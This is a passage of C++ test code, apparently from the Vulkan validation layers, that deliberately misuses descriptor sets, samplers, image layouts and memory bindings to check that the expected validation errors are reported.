sizeof(descriptor_write)); descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_set.set_; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; descriptor_write.pImageInfo = &img_info; std::array<VkWriteDescriptorSet, 2> descriptor_writes = {descriptor_write, descriptor_write}; descriptor_writes[1].dstBinding = 1; descriptor_writes[1].pImageInfo = &img_info1; vk::UpdateDescriptorSets(m_device->device(), 2, descriptor_writes.data(), 0, NULL); // Destroy the sampler before it's bound to the cmd buffer vk::DestroySampler(m_device->device(), sampler1, NULL); // Create PSO to be used for draw-time errors below char const *fsSource = "#version 450\n" "\n" "layout(set=0, binding=0) uniform sampler2D s;\n" "layout(set=0, binding=1) uniform sampler2D s1;\n" "layout(location=0) out vec4 x;\n" "void main(){\n" " x = texture(s, vec2(1));\n" " x = texture(s1, vec2(1));\n" "}\n"; VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, fsSource, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); // First error case is destroying sampler prior to cmd buffer submission m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 0, NULL); VkViewport viewport = {0, 0, 16, 16, 0, 1}; VkRect2D scissor = {{0, 0}, {16, 16}}; vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " Descriptor in binding #1 index 0 is using sampler "); m_commandBuffer->Draw(1, 0, 0, 0); m_errorMonitor->VerifyFound(); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); vk::DestroySampler(m_device->device(), sampler, NULL); vk::DestroyImageView(m_device->device(), view, NULL); } TEST_F(VkLayerTest, ImageDescriptorLayoutMismatch) { TEST_DESCRIPTION("Create an image sampler layout->image layout mismatch within/without a command buffer"); ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool maint2_support = DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE2_EXTENSION_NAME); if (maint2_support) { m_device_extension_names.push_back(VK_KHR_MAINTENANCE2_EXTENSION_NAME); } else { printf("%s Relaxed layout matching subtest requires API >= 1.1 or KHR_MAINTENANCE2 extension, unavailable - skipped.\n", kSkipPrefix); } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkDescriptorSet descriptorSet = descriptor_set.set_; const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); // Create image, view, and sampler const VkFormat format = VK_FORMAT_B8G8R8A8_UNORM; VkImageObj image(m_device); image.Init(32, 32, 1, format, VK_IMAGE_USAGE_SAMPLED_BIT | VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); vk_testing::ImageView view; auto image_view_create_info = SafeSaneImageViewCreateInfo(image, format, VK_IMAGE_ASPECT_COLOR_BIT); view.init(*m_device, image_view_create_info); ASSERT_TRUE(view.initialized()); // Create Sampler vk_testing::Sampler sampler; VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); sampler.init(*m_device, sampler_ci); ASSERT_TRUE(sampler.initialized()); // Setup structure for descriptor update with sampler, for update in do_test below VkDescriptorImageInfo img_info = {}; img_info.sampler = sampler.handle(); VkWriteDescriptorSet descriptor_write; memset(&descriptor_write, 0, sizeof(descriptor_write)); descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptorSet; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; descriptor_write.pImageInfo = &img_info; // Create PSO to be used for draw-time errors below VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, bindStateFragSamplerShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); VkViewport viewport = {0, 0, 16, 16, 0, 1}; VkRect2D scissor = {{0, 0}, {16, 16}}; VkCommandBufferObj cmd_buf(m_device, m_commandPool); VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &cmd_buf.handle(); enum TestType { kInternal, // Image layout mismatch is *within* a given command buffer kExternal // Image layout mismatch is with the current state of the image, found at QueueSubmit }; std::array<TestType, 2> test_list = {kInternal, kExternal}; const std::vector<std::string> internal_errors = {"VUID-VkDescriptorImageInfo-imageLayout-00344", "UNASSIGNED-CoreValidation-DrawState-DescriptorSetNotUpdated"}; const std::vector<std::string> external_errors = {"UNASSIGNED-CoreValidation-DrawState-InvalidImageLayout"}; // Common steps to create the two classes of errors (or two classes of positives) auto do_test = [&](VkImageObj *image, vk_testing::ImageView *view, VkImageAspectFlags aspect_mask, VkImageLayout image_layout, VkImageLayout descriptor_layout, const bool positive_test) { // Set up the descriptor img_info.imageView = view->handle(); img_info.imageLayout = descriptor_layout; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); for (TestType test_type : test_list) { cmd_buf.begin(); // record layout different than actual descriptor layout. const VkFlags read_write = VK_ACCESS_MEMORY_READ_BIT | VK_ACCESS_MEMORY_WRITE_BIT; auto image_barrier = image->image_memory_barrier(read_write, read_write, VK_IMAGE_LAYOUT_UNDEFINED, image_layout, image->subresource_range(aspect_mask)); cmd_buf.PipelineBarrier(VK_PIPELINE_STAGE_ALL_GRAPHICS_BIT, VK_PIPELINE_STAGE_ALL_GRAPHICS_BIT, 0, 0, nullptr, 0, nullptr, 1, &image_barrier); if (test_type == kExternal) { // The image layout is external to the command buffer we are recording to test. Submit to push to instance scope. cmd_buf.end(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); cmd_buf.begin(); } cmd_buf.BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(cmd_buf.handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(cmd_buf.handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); vk::CmdSetViewport(cmd_buf.handle(), 0, 1, &viewport); vk::CmdSetScissor(cmd_buf.handle(), 0, 1, &scissor); // At draw time the update layout will mis-match the actual layout if (positive_test || (test_type == kExternal)) { m_errorMonitor->ExpectSuccess(); } else { for (const auto &err : internal_errors) { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, err.c_str()); } } cmd_buf.Draw(1, 0, 0, 0); if (positive_test || (test_type == kExternal)) { m_errorMonitor->VerifyNotFound(); } else { m_errorMonitor->VerifyFound(); } m_errorMonitor->ExpectSuccess(); cmd_buf.EndRenderPass(); cmd_buf.end(); m_errorMonitor->VerifyNotFound(); // Submit cmd buffer if (positive_test || (test_type == kInternal)) { m_errorMonitor->ExpectSuccess(); } else { for (const auto &err : external_errors) { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, err.c_str()); } } vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); if (positive_test || (test_type == kInternal)) { m_errorMonitor->VerifyNotFound(); } else { m_errorMonitor->VerifyFound(); } } }; do_test(&image, &view, VK_IMAGE_ASPECT_COLOR_BIT, VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, /* positive */ false); // Create depth stencil image and views const VkFormat format_ds = m_depth_stencil_fmt = FindSupportedDepthStencilFormat(gpu()); bool ds_test_support = maint2_support && (format_ds != VK_FORMAT_UNDEFINED); VkImageObj image_ds(m_device); vk_testing::ImageView stencil_view; vk_testing::ImageView depth_view; const VkImageLayout ds_image_layout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL; const VkImageLayout depth_descriptor_layout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL; const VkImageLayout stencil_descriptor_layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL; const VkImageAspectFlags depth_stencil = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; if (ds_test_support) { image_ds.Init(32, 32, 1, format_ds, VK_IMAGE_USAGE_SAMPLED_BIT | VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image_ds.initialized()); auto ds_view_ci = SafeSaneImageViewCreateInfo(image_ds, format_ds, VK_IMAGE_ASPECT_DEPTH_BIT); depth_view.init(*m_device, ds_view_ci); ds_view_ci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_STENCIL_BIT; stencil_view.init(*m_device, ds_view_ci); do_test(&image_ds, &depth_view, depth_stencil, ds_image_layout, depth_descriptor_layout, /* positive */ true); do_test(&image_ds, &depth_view, depth_stencil, ds_image_layout, VK_IMAGE_LAYOUT_GENERAL, /* positive */ false); do_test(&image_ds, &stencil_view, depth_stencil, ds_image_layout, stencil_descriptor_layout, /* positive */ true); do_test(&image_ds, &stencil_view, depth_stencil, ds_image_layout, VK_IMAGE_LAYOUT_GENERAL, /* positive */ false); } } TEST_F(VkLayerTest, DescriptorPoolInUseResetSignaled) { TEST_DESCRIPTION("Reset a DescriptorPool with a DescriptorSet that is in use."); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); // Create image to update the descriptor with VkImageObj image(m_device); image.Init(32, 32, 1, VK_FORMAT_B8G8R8A8_UNORM, VK_IMAGE_USAGE_SAMPLED_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); VkImageView view = image.targetView(VK_FORMAT_B8G8R8A8_UNORM); // Create Sampler VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; VkResult err = vk::CreateSampler(m_device->device(), &sampler_ci, nullptr, &sampler); ASSERT_VK_SUCCESS(err); // Update descriptor with image and sampler descriptor_set.WriteDescriptorImageInfo(0, view, sampler); descriptor_set.UpdateDescriptorSets(); // Create PSO to be used for draw-time errors below VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, bindStateFragSamplerShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 0, nullptr); VkViewport viewport = {0, 0, 16, 16, 0, 1}; VkRect2D scissor = {{0, 0}, {16, 16}}; vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); // Submit cmd buffer to put pool in-flight VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); // Reset pool while in-flight, causing error m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkResetDescriptorPool-descriptorPool-00313"); vk::ResetDescriptorPool(m_device->device(), descriptor_set.pool_, 0); m_errorMonitor->VerifyFound(); vk::QueueWaitIdle(m_device->m_queue); // Cleanup vk::DestroySampler(m_device->device(), sampler, nullptr); m_errorMonitor->SetUnexpectedError( "If descriptorPool is not VK_NULL_HANDLE, descriptorPool must be a valid VkDescriptorPool handle"); m_errorMonitor->SetUnexpectedError("Unable to remove DescriptorPool obj"); } TEST_F(VkLayerTest, DescriptorImageUpdateNoMemoryBound) { TEST_DESCRIPTION("Attempt an image descriptor set update where image's bound memory has been freed."); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); // Create images to update the descriptor with VkImage image; const VkFormat tex_format = VK_FORMAT_B8G8R8A8_UNORM; const int32_t tex_width = 32; const int32_t tex_height = 32; VkImageCreateInfo image_create_info = {}; image_create_info.sType = VK_STRUCTURE_TYPE_IMAGE_CREATE_INFO; image_create_info.pNext = NULL; image_create_info.imageType = VK_IMAGE_TYPE_2D; image_create_info.format = tex_format; image_create_info.extent.width = tex_width; image_create_info.extent.height = tex_height; image_create_info.extent.depth = 1; image_create_info.mipLevels = 1; image_create_info.arrayLayers = 1; image_create_info.samples = VK_SAMPLE_COUNT_1_BIT; image_create_info.tiling = VK_IMAGE_TILING_OPTIMAL; image_create_info.usage = VK_IMAGE_USAGE_SAMPLED_BIT; image_create_info.flags = 0; VkResult err = vk::CreateImage(m_device->device(), &image_create_info, NULL, &image); ASSERT_VK_SUCCESS(err); // Initially bind memory to avoid error at bind view time. We'll break binding before update. VkMemoryRequirements memory_reqs; VkDeviceMemory image_memory; bool pass; VkMemoryAllocateInfo memory_info = {}; memory_info.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO; memory_info.pNext = NULL; memory_info.allocationSize = 0; memory_info.memoryTypeIndex = 0; vk::GetImageMemoryRequirements(m_device->device(), image, &memory_reqs); // Allocate enough memory for image memory_info.allocationSize = memory_reqs.size; pass = m_device->phy().set_memory_type(memory_reqs.memoryTypeBits, &memory_info, 0); ASSERT_TRUE(pass); err = vk::AllocateMemory(m_device->device(), &memory_info, NULL, &image_memory); ASSERT_VK_SUCCESS(err); err = vk::BindImageMemory(m_device->device(), image, image_memory, 0); ASSERT_VK_SUCCESS(err); VkImageViewCreateInfo image_view_create_info = {}; image_view_create_info.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; image_view_create_info.image = image; image_view_create_info.viewType = VK_IMAGE_VIEW_TYPE_2D; image_view_create_info.format = tex_format; image_view_create_info.subresourceRange.layerCount = 1; image_view_create_info.subresourceRange.baseMipLevel = 0; image_view_create_info.subresourceRange.levelCount = 1; image_view_create_info.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; VkImageView view; err = vk::CreateImageView(m_device->device(), &image_view_create_info, NULL, &view); ASSERT_VK_SUCCESS(err); // Create Samplers VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); // Update descriptor with image and sampler descriptor_set.WriteDescriptorImageInfo(0, view, sampler); // Break memory binding and attempt update vk::FreeMemory(m_device->device(), image_memory, nullptr); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " previously bound memory was freed. Memory must not be freed prior to this operation."); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "vkUpdateDescriptorSets() failed write update validation for "); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); // Cleanup vk::DestroyImage(m_device->device(), image, NULL); vk::DestroySampler(m_device->device(), sampler, NULL); vk::DestroyImageView(m_device->device(), view, NULL); } TEST_F(VkLayerTest, InvalidDynamicOffsetCases) { // Create a descriptorSet w/ dynamic descriptor and then hit 3 offset error // cases: // 1. No dynamicOffset supplied // 2. Too many dynamicOffsets supplied // 3. Dynamic offset oversteps buffer being updated m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " requires 1 dynamicOffsets, but only 0 dynamicOffsets are left in pDynamicOffsets "); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC, 1, VK_SHADER_STAGE_ALL, nullptr}, }); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); // Create a buffer to update the descriptor with uint32_t qfi = 0; VkBufferCreateInfo buffCI = {}; buffCI.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; buffCI.size = 1024; buffCI.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; buffCI.queueFamilyIndexCount = 1; buffCI.pQueueFamilyIndices = &qfi; VkBufferObj dynamic_uniform_buffer; dynamic_uniform_buffer.init(*m_device, buffCI); // Correctly update descriptor to avoid "NOT_UPDATED" error descriptor_set.WriteDescriptorBufferInfo(0, dynamic_uniform_buffer.handle(), 1024, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC); descriptor_set.UpdateDescriptorSets(); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 0, NULL); m_errorMonitor->VerifyFound(); uint32_t pDynOff[2] = {512, 756}; // Now cause error b/c too many dynOffsets in array for # of dyn descriptors m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "Attempting to bind 1 descriptorSets with 1 dynamic descriptors, but "); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 2, pDynOff); m_errorMonitor->VerifyFound(); // Finally cause error due to dynamicOffset being too big m_errorMonitor->SetDesiredFailureMsg( VK_DEBUG_REPORT_ERROR_BIT_EXT, " dynamic offset 512 combined with offset 0 and range 1024 that oversteps the buffer size of 1024"); // Create PSO to be used for draw-time errors below VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, bindStateFragUniformShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); VkViewport viewport = {0, 0, 16, 16, 0, 1}; vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); VkRect2D scissor = {{0, 0}, {16, 16}}; vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); // This update should succeed, but offset size of 512 will overstep buffer // /w range 1024 & size 1024 vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 1, pDynOff); m_commandBuffer->Draw(1, 0, 0, 0); m_errorMonitor->VerifyFound(); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); } TEST_F(VkLayerTest, DescriptorBufferUpdateNoMemoryBound) { TEST_DESCRIPTION("Attempt to update a descriptor with a non-sparse buffer that doesn't have memory bound"); VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " used with no memory bound. Memory should be bound by calling vkBindBufferMemory()."); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "vkUpdateDescriptorSets() failed write update validation for "); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC, 1, VK_SHADER_STAGE_ALL, nullptr}, }); // Create a buffer to update the descriptor with uint32_t qfi = 0; VkBufferCreateInfo buffCI = {}; buffCI.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; buffCI.size = 1024; buffCI.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; buffCI.queueFamilyIndexCount = 1; buffCI.pQueueFamilyIndices = &qfi; VkBuffer dynamic_uniform_buffer; err = vk::CreateBuffer(m_device->device(), &buffCI, NULL, &dynamic_uniform_buffer); ASSERT_VK_SUCCESS(err); // Attempt to update descriptor without binding memory to it descriptor_set.WriteDescriptorBufferInfo(0, dynamic_uniform_buffer, 1024, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroyBuffer(m_device->device(), dynamic_uniform_buffer, NULL); } TEST_F(VkLayerTest, DescriptorSetCompatibility) { // Test various desriptorSet errors with bad binding combinations using std::vector; VkResult err; ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); static const uint32_t NUM_DESCRIPTOR_TYPES = 5; VkDescriptorPoolSize ds_type_count[NUM_DESCRIPTOR_TYPES] = {}; ds_type_count[0].type = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; ds_type_count[0].descriptorCount = 10; ds_type_count[1].type = VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE; ds_type_count[1].descriptorCount = 2; ds_type_count[2].type = VK_DESCRIPTOR_TYPE_STORAGE_IMAGE; ds_type_count[2].descriptorCount = 2; ds_type_count[3].type = VK_DESCRIPTOR_TYPE_SAMPLER; ds_type_count[3].descriptorCount = 5; // TODO : LunarG ILO driver currently asserts in desc.c w/ INPUT_ATTACHMENT // type // ds_type_count[4].type = VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT; ds_type_count[4].type = VK_DESCRIPTOR_TYPE_STORAGE_TEXEL_BUFFER; ds_type_count[4].descriptorCount = 2; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.maxSets = 5; ds_pool_ci.poolSizeCount = NUM_DESCRIPTOR_TYPES; ds_pool_ci.pPoolSizes = ds_type_count; VkDescriptorPool ds_pool; err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); ASSERT_VK_SUCCESS(err); static const uint32_t MAX_DS_TYPES_IN_LAYOUT = 2; VkDescriptorSetLayoutBinding dsl_binding[MAX_DS_TYPES_IN_LAYOUT] = {}; dsl_binding[0].binding = 0; dsl_binding[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding[0].descriptorCount = 5; dsl_binding[0].stageFlags = VK_SHADER_STAGE_ALL; dsl_binding[0].pImmutableSamplers = NULL; // Create layout identical to set0 layout but w/ different stageFlags VkDescriptorSetLayoutBinding dsl_fs_stage_only = {}; dsl_fs_stage_only.binding = 0; dsl_fs_stage_only.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_fs_stage_only.descriptorCount = 5; dsl_fs_stage_only.stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; // Different stageFlags to cause error at // bind time dsl_fs_stage_only.pImmutableSamplers = NULL; vector<VkDescriptorSetLayoutObj> ds_layouts; // Create 4 unique layouts for full pipelineLayout, and 1 special fs-only // layout for error case ds_layouts.emplace_back(m_device, std::vector<VkDescriptorSetLayoutBinding>(1, dsl_binding[0])); const VkDescriptorSetLayoutObj ds_layout_fs_only(m_device, {dsl_fs_stage_only}); dsl_binding[0].binding = 0; dsl_binding[0].descriptorType = VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE; dsl_binding[0].descriptorCount = 2; dsl_binding[1].binding = 1; dsl_binding[1].descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_IMAGE; dsl_binding[1].descriptorCount = 2; dsl_binding[1].stageFlags = VK_SHADER_STAGE_ALL; dsl_binding[1].pImmutableSamplers = NULL; ds_layouts.emplace_back(m_device, std::vector<VkDescriptorSetLayoutBinding>({dsl_binding[0], dsl_binding[1]})); dsl_binding[0].binding = 0; dsl_binding[0].descriptorType = VK_DESCRIPTOR_TYPE_SAMPLER; dsl_binding[0].descriptorCount = 5; ds_layouts.emplace_back(m_device, std::vector<VkDescriptorSetLayoutBinding>(1, dsl_binding[0])); dsl_binding[0].descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_TEXEL_BUFFER; dsl_binding[0].descriptorCount = 2; ds_layouts.emplace_back(m_device, std::vector<VkDescriptorSetLayoutBinding>(1, dsl_binding[0])); const auto &ds_vk_layouts = MakeVkHandles<VkDescriptorSetLayout>(ds_layouts); static const uint32_t NUM_SETS = 4; VkDescriptorSet descriptorSet[NUM_SETS] = {}; VkDescriptorSetAllocateInfo alloc_info = {}; alloc_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_ALLOCATE_INFO; alloc_info.descriptorPool = ds_pool; alloc_info.descriptorSetCount = ds_vk_layouts.size(); alloc_info.pSetLayouts = ds_vk_layouts.data(); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, descriptorSet); ASSERT_VK_SUCCESS(err); VkDescriptorSet ds0_fs_only = {}; alloc_info.descriptorSetCount = 1; alloc_info.pSetLayouts = &ds_layout_fs_only.handle(); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, &ds0_fs_only); ASSERT_VK_SUCCESS(err); const VkPipelineLayoutObj pipeline_layout(m_device, {&ds_layouts[0], &ds_layouts[1]}); // Create pipelineLayout with only one setLayout const VkPipelineLayoutObj single_pipe_layout(m_device, {&ds_layouts[0]}); // Create pipelineLayout with 2 descriptor setLayout at index 0 const VkPipelineLayoutObj pipe_layout_one_desc(m_device, {&ds_layouts[3]}); // Create pipelineLayout with 5 SAMPLER descriptor setLayout at index 0 const VkPipelineLayoutObj pipe_layout_five_samp(m_device, {&ds_layouts[2]}); // Create pipelineLayout with UB type, but stageFlags for FS only VkPipelineLayoutObj pipe_layout_fs_only(m_device, {&ds_layout_fs_only}); // Create pipelineLayout w/ incompatible set0 layout, but set1 is fine const VkPipelineLayoutObj pipe_layout_bad_set0(m_device, {&ds_layout_fs_only, &ds_layouts[1]}); // Add buffer binding for UBO uint32_t qfi = 0; VkBufferCreateInfo bci = {}; bci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; bci.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; bci.size = 8; bci.queueFamilyIndexCount = 1; bci.pQueueFamilyIndices = &qfi; VkBufferObj buffer; buffer.init(*m_device, bci); VkDescriptorBufferInfo buffer_info; buffer_info.buffer = buffer.handle(); buffer_info.offset = 0; buffer_info.range = VK_WHOLE_SIZE; VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptorSet[0]; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_write.pBufferInfo = &buffer_info; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); // Create PSO to be used for draw-time errors 